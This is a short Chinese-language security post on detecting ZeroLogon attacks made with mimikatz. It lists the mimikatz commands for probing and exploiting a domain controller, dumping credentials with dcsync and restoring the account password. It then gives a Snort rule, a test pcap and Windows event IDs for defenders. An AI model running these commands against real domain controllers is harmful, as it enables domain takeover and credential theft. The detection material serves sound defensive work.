0x01 前言

mimikatz 20200918版本支持通過zerologon漏洞攻擊域控服務器。下載鏈接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截圖如下

mimikatz相關命令

1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc
2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通過zerologon漏洞攻擊域控服務器
3. lsadump::dcsync
4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢復密碼

 

snort 檢測規則

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

利用zerologon漏洞攻擊域控的數據包，方便同學們寫完規則做測試pcap github下載地址

windows事件管理器自查

在未打補丁的域控，重點查看windows事件管理器中，eventid為4742或者4624, 5805

在windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。藍隊可以重點關注這幾個事件ID以方便自查

1. 當在初始部署階段允許存在漏洞的Netlogon安全通道連接時，將生成事件ID 5829。
2. 管理員可以監控事件ID 5827和5828，這些事件ID在存在漏洞的Netlogon連接被拒絕時觸發
3. 5830，5831  如果“域控制器：允許易受攻擊的Netlogon安全通道連接”組策略允許連接。

mimikatz通過zerologon攻擊成功后，將會留下事件id為4648。